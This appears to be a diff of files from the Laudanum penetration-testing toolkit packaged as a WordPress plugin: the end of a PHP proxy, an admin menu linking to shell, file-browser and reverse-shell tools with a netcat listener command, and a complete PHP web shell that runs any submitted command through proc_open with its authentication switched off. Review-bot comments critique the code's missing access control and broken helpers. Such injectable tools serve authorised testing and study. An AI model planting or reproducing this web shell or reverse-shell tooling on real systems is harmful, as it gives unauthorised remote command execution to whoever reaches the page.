if ( $flg & 4 ) {
list($xlen) = unpack('v', substr($gzData, $i, 2) );
$i = $i + 2 + $xlen;
}
if ( $flg & 8 )
$i = strpos($gzData, "\0", $i) + 1;
if ( $flg & 16 )
$i = strpos($gzData, "\0", $i) + 1;
if ( $flg & 2 )
$i = $i + 2;
}
return @gzinflate( substr($gzData, $i, -8) );
} else {
return false;
}
return false;
}
function rewrite ($d, $u) {
$r = $d;
//rewrite images and links - absolute reference
$r = preg_replace("/((src|href).?=.?['\"]?)(\/[^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . $u["scheme"] . "://" . $u["host"] . "\\3", $r);
//rewrite images and links - hard linked
$r = preg_replace("/((src|href).?=.?['\"])(http[^'\"]+['\"])/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . "\\3", $r);
//rewrite images and links - relative reference
$r = preg_replace("/((src|href).?=.?['\"])([^\/][^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . buildurlpath($u) . "\\3", $r);
//rewrite form - absolute reference
$r = preg_replace("/(<form(.+?)action.?=.?['\"])(\/[^'\"]+)(['\"])([^\>]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4><input type=\"hidden\" name=\"laudurl\" value=\"" . $u["scheme"] . "://" . $u["host"] . "\\3\">", $r);
//rewrite form - hard linked
$r = preg_replace("/(<form(.+?)action.?=.?['\"])(http[^'\"]+)(['\"])([^\>]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4><input type=\"hidden\" name=\"laudurl\" value=\"" . "\\3\">", $r);
//rewrite form - relative reference
$r = preg_replace("/(<form(.+?)action.?=.?['\"])([^\/][^'\"]+)(['\"])([^\>]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4><input type=\"hidden\" name=\"laudurl\" value=\"" . buildurlpath($u) . "\\3\">", $r);
return $r;
}
/* Initialize some variables we need again and again. */
$url = isset($_GET["laudurl"]) ? $_GET["laudurl"] : "";
if ($url == "") {
$url = isset($_POST["laudurl"]) ? $_POST["laudurl"] : "";
}
if ($url == "") {
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Laudanum PHP Proxy</title>
<link rel="stylesheet" href="style.css" type="text/css">
<script type="text/javascript">
function init() {
document.proxy.url.focus();
}
</script>
</head>
<body onload="init()">
<h1>Laudanum PHP Proxy</h1>
<form method="GET" name="proxy">
<input type="text" name="laudurl" size="70">
</form>
<hr>
<address>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>
<?php
} else {
$url_c = geturlarray($url);
$params = array_merge($_GET, $_POST);
//don't pass throught the parameter we are using
unset($params["laudurl"]);
//create the query or post parameters
$query = http_build_query($params);
if ($query != "") {
$url_c["query"] = $query;
}
//get the files
$fp = fopen(buildurl($url_c), "rb");
// use the headers, except the response code which is popped off the array
$headers = $http_response_header;
// pop
array_shift($headers);
// fix cookies
$headers = rewritecookies($headers);
$ctype = getcontenttype($headers);
$cencoding = getcontentencoding($headers);
// we will remove gzip encoding later, but we need to remove the header now
// before it is added to the response.
if ($cencoding == "gzip")
$headers = removeheader("Content-Encoding", $headers);
// set headers for response to client
if (preg_match("/text|image/", $ctype)) {
header_remove();
// the number of headers can change due to replacement
$i = 0;
while ($i < count($headers)) {
if (strpos($headers[$i], "Set-Cookie:") == false)
// replace headers
header($headers[$i], true);
else
// if it is the first cookie, replace all the others. Otherwise add
header($headers[$i], false);
$i++;
}
} else {
header("Content-Disposition: attachment; filename=" . getfilename($url_c));
}
// get data
if (preg_match("/text/",$ctype)) { //text
//it is a text format: html, css, js
$data = "";
while (!feof($fp)) {
$data .= fgets($fp, 4096);
}
// uncompress it so it can be rewritten
if ($cencoding == "gzip")
$data = compatible_gzinflate($data);
// rewrite all the links and such
echo rewrite($data, $url_c);
} else {
// binary format or something similar, let it go through
fpassthru($fp);
fclose($fp);
}
}
?>


@ -0,0 +1,67 @@
<?php
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net>
*** Tim Medin <tim@counterhack.com>
***
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
***
********************************************************************************
***
*** This file provides a convenient menu of Laudanum tools from a Word Press settings
*** page.
***
*** Written by Jason Gillam <jgillam@secureideas.com>
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***
***************************************************************************** */
?>
<div class="wrap">
<h2>Laudanum Tools</h2>
<ul>
<li><a href="<?php echo plugins_url('shell.php', __FILE__);?>">Shell</a> </li>
<li><a href="<?php echo plugins_url('dns.php', __FILE__);?>">DNS</a> </li>
<li><a href="<?php echo plugins_url('host.php', __FILE__);?>">Host Lookup</a> </li>
<li><a href="<?php echo plugins_url('file.php', __FILE__);?>">File Browser</a> </li>
<li><a href="<?php echo plugins_url('proxy.php', __FILE__);?>">Proxy</a> </li>
<li>Reverse Shell -
<form action="<?php echo plugins_url('php-reverse-shell.php', __FILE__);?>" method="post">
IP: <input name="ip" type="text" value="127.0.0.1">
Port: <input name="port" type="text" value="8888">
<input type="submit" value="Connect"></p>
</form></li>
<!--<li><a href="<?php echo plugins_url('php-reverse-shell.php', __FILE__);?>">Reverse Shell (requires hard-coded config)</a> </li>-->
</form>
<li><a href="<?php echo plugins_url('killnc.php', __FILE__);?>">kill nc (recover if nc screws up your shell)</a> </li>
</ul>
* for reverse shell, use netcat to listen, e.g. "nc -v -n -l 8888"
</div>
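Review bot: This template calls `plugins_url()` with no guard against being requested directly, so outside WordPress it would stop on an undefined function and, depending on the error-display settings, print the server path. Add `if (!defined('ABSPATH')) { exit; }` right after the header comment. The link targets and the form action are echoed unescaped, where the WordPress convention is `echo esc_url(plugins_url('shell.php', __FILE__));`. The list markup is also unbalanced: the `</p>` after the submit button has no opening `<p>`, and the `</form>` following the commented-out entry closes nothing.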


@ -0,0 +1,389 @@
<?php
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net>
*** Tim Medin <tim@counterhack.com>
***
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
***
********************************************************************************
***
*** This file provides shell access to the system. It is built based on the 2.1
*** version of PHPShell which is Copyright (C) 2000-2005 Martin Geisler
*** <mgeisler[at]mgeisler.net>
***
*** Updated by Tim Medin
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***
***************************************************************************** */
include 'ipcheck.php';
/* This error handler will turn all notices, warnings, and errors into fatal
* errors, unless they have been suppressed with the @-operator. */
function wpl_error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
/* The @-opertor (used with chdir() below) temporarely makes
* error_reporting() return zero, and we don't want to die in that case.
* We do note the error in the output, though. */
if (error_reporting() == 0) {
$_SESSION['output'] .= $errstr . "\n";
} else {
die('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Laudanum PHP Shell Access</title>
</head>
<body>
<h1>Fatal Error!</h1>
<p><b>' . $errstr . '</b></p>
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
<hr>
<address>
Copyright &copy; 2014, <a
href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>');
}
}
// set_error_handler('wpl_error_handler');
function logout() {
$_SESSION = array('authenticated' => false);
if (isset($_COOKIE[session_name()]))
setcookie(session_name(), '', time()-42000, '/');
session_destroy();
}
function wpl_stripslashes_deep($value) {
if (is_array($value))
return array_map('stripslashes_deep', $value);
else
return stripslashes($value);
}
if (get_magic_quotes_gpc())
$_POST = stripslashes_deep($_POST);
/* Initialize some variables we need again and again. */
//$username = isset($_POST['username']) ? $_POST['username'] : '';
//$password = isset($_POST['password']) ? $_POST['password'] : '';
//$nounce = isset($_POST['nounce']) ? $_POST['nounce'] : '';
$command = isset($_POST['command']) ? $_POST['command'] : '';
$rows = isset($_POST['rows']) ? $_POST['rows'] : 24;
$columns = isset($_POST['columns']) ? $_POST['columns'] : 80;
///* Default settings --- these settings should always be set to something. */
//$default_settings = array('home-directory' => '.');
///* Merge settings. */
//$ini['settings'] = array_merge($default_settings, $ini['settings']);
session_start();
/* Delete the session data if the user requested a logout. This leaves the
* session cookie at the user, but this is not important since we
* authenticates on $_SESSION['authenticated']. */
if (isset($_POST['logout']))
logout();
///* Attempt authentication. */
//if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] &&
// isset($ini['users'][$username])) {
// if (strchr($ini['users'][$username], ':') === false) {
// // No seperator found, assume this is a password in clear text.
// $_SESSION['authenticated'] = ($ini['users'][$username] == $password);
// } else {
// list($fkt, $salt, $hash) = explode(':', $ini['users'][$username]);
// $_SESSION['authenticated'] = ($fkt($salt . $password) == $hash);
// }
//}
/* Attempt authentication. */
if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] && isset($users[$username]))
$_SESSION['authenticated'] = ($users[$username] == hash("sha1", $password));
/* Enforce default non-authenticated state if the above code didn't set it
* already. */
if (!isset($_SESSION['authenticated']))
$_SESSION['authenticated'] = false;
if(true) {
//if ($_SESSION['authenticated']) {
/* Initialize the session variables. */
if (empty($_SESSION['cwd'])) {
$_SESSION['cwd'] = '.';
$_SESSION['history'] = array();
$_SESSION['output'] = '';
}
if (!empty($command)) {
/* Save the command for late use in the JavaScript. If the command is
* already in the history, then the old entry is removed before the
* new entry is put into the list at the front. */
if (($i = array_search($command, $_SESSION['history'])) !== false)
unset($_SESSION['history'][$i]);
array_unshift($_SESSION['history'], $command);
/* Now append the commmand to the output. */
$_SESSION['output'] .= '$ ' . $command . "\n";
/* Initialize the current working directory. */
if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) {
$_SESSION['cwd'] = realpath($ini['settings']['home-directory']);
} elseif (preg_match('/^[[:blank:]]*cd[[:blank:]]+([^;]+)$/', $command, $regs)) {
/* The current command is a 'cd' command which we have to handle
* as an internal shell command. */
if ($regs[1]{0} == '/') {
/* Absolute path, we use it unchanged. */
$new_dir = $regs[1];
} else {
/* Relative path, we append it to the current working
* directory. */
$new_dir = $_SESSION['cwd'] . '/' . $regs[1];
}
/* Transform '/./' into '/' */
while (strpos($new_dir, '/./') !== false)
$new_dir = str_replace('/./', '/', $new_dir);
/* Transform '//' into '/' */
while (strpos($new_dir, '//') !== false)
$new_dir = str_replace('//', '/', $new_dir);
/* Transform 'x/..' into '' */
while (preg_match('|/\.\.(?!\.)|', $new_dir))
$new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
if ($new_dir == '') $new_dir = '/';
/* Try to change directory. */
if (@chdir($new_dir)) {
$_SESSION['cwd'] = $new_dir;
} else {
$_SESSION['output'] .= "cd: could not change to: $new_dir\n";
}
} elseif (trim($command) == 'exit') {
logout();
} else {
/* The command is not an internal command, so we execute it after
* changing the directory and save the output. */
chdir($_SESSION['cwd']);
// We canot use putenv() in safe mode.
if (!ini_get('safe_mode')) {
// Advice programs (ls for example) of the terminal size.
putenv('ROWS=' . $rows);
putenv('COLUMNS=' . $columns);
}
/* Alias expansion. */
$length = strcspn($command, " \t");
$token = substr($command, 0, $length);
if (isset($ini['aliases'][$token]))
$command = $ini['aliases'][$token] . substr($command, $length);
$io = array();
$p = proc_open($command,
array(1 => array('pipe', 'w'),
2 => array('pipe', 'w')),
$io);
/* Read output sent to stdout. */
while (!feof($io[1])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
ENT_COMPAT, 'UTF-8');
}
/* Read output sent to stderr. */
while (!feof($io[2])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
ENT_COMPAT, 'UTF-8');
}
fclose($io[1]);
fclose($io[2]);
proc_close($p);
}
}
/* Build the command history for use in the JavaScript */
if (empty($_SESSION['history'])) {
$js_command_hist = '""';
} else {
$escaped = array_map('addslashes', $_SESSION['history']);
$js_command_hist = '"", "' . implode('", "', $escaped) . '"';
}
}
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Laudanum Shell</title>
<link rel="stylesheet" href="style.css" type="text/css">
<script type="text/javascript">
<?php if (true) { ?>
var current_line = 0;
var command_hist = new Array(<?php echo $js_command_hist ?>);
var last = 0;
function key(e) {
if (!e) var e = window.event;
if (e.keyCode == 38 && current_line < command_hist.length-1) {
command_hist[current_line] = document.shell.command.value;
current_line++;
document.shell.command.value = command_hist[current_line];
}
if (e.keyCode == 40 && current_line > 0) {
command_hist[current_line] = document.shell.command.value;
current_line--;
document.shell.command.value = command_hist[current_line];
}
}
function init() {
document.shell.setAttribute("autocomplete", "off");
document.shell.output.scrollTop = document.shell.output.scrollHeight;
document.shell.command.focus();
}
<?php } else { ?>
function init() {
document.shell.username.focus();
}
<?php } ?>
</script>
</head>
<body onload="init()">
<h1>Laudanum Shell</h1>
<form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="post">
<?php
if (false) {
/* Genereate a new nounce every time we preent the login page. This binds
* each login to a unique hit on the server and prevents the simple replay
* attack where one uses the back button in the browser to replay the POST
* data from a login. */
$_SESSION['nounce'] = mt_rand();
?>
<fieldset>
<legend>Authentication</legend>
<?php
if (false)
echo ' <p class="error">Login failed, please try again:</p>' . "\n";
else
echo " <p>Please login:</p>\n";
?>
<p>Username: <input name="username" type="text" value="<?php echo $username
?>"></p>
<p>Password: <input name="password" type="password"></p>
<p><input type="submit" value="Login"></p>
<input name="nounce" type="hidden" value="<?php echo $_SESSION['nounce']; ?>">
</fieldset>
<?php } else { /* Authenticated. */ ?>
<fieldset>
<legend>Current Working Directory: <code><?php
echo htmlspecialchars($_SESSION['cwd'], ENT_COMPAT, 'UTF-8');
?></code></legend>
<div id="terminal">
<textarea name="output" readonly="readonly" cols="<?php echo $columns ?>" rows="<?php echo $rows ?>">
<?php
$lines = substr_count($_SESSION['output'], "\n");
$padding = str_repeat("\n", max(0, $rows+1 - $lines));
echo rtrim($padding . $_SESSION['output']);
?>
</textarea>
<p id="prompt">
$&nbsp;<input name="command" type="text"
onkeyup="key(event)" size="<?php echo $columns-2 ?>" tabindex="1">
</p>
</div>
<p>
<span style="float: right">Size: <input type="text" name="rows" size="2"
maxlength="3" value="<?php echo $rows ?>"> &times; <input type="text"
name="columns" size="2" maxlength="3" value="<?php echo $columns
?>"></span>
<input type="submit" value="Execute Command">
<input type="submit" name="logout" value="Logout">
</p>
</fieldset>
<?php } ?>
</form>
<hr/>
<address>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Updated by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>
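Review bot: Authentication is hard-wired off in this copy: the main branch is `if(true) {` with `//if ($_SESSION['authenticated']) {` commented out beneath it, and the login form sits under `if (false)`. The only access control left is whatever `include 'ipcheck.php'` enforces, which is not visible in this section. The surviving check `if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] && isset($users[$username]))` reads `$nounce`, `$username`, `$users` and `$password`, none of which are assigned here because their initialisation is commented out, so it cannot succeed as written. Either restore `if ($_SESSION['authenticated']) {` together with the variables it needs, or delete the dead login code and add a comment stating that ipcheck.php is the sole gate and must be configured before the file is deployed. Separately, the helper was renamed to `wpl_stripslashes_deep` but still maps and is called as `stripslashes_deep`, and `$ini` is read for the home directory and aliases without being defined in this file.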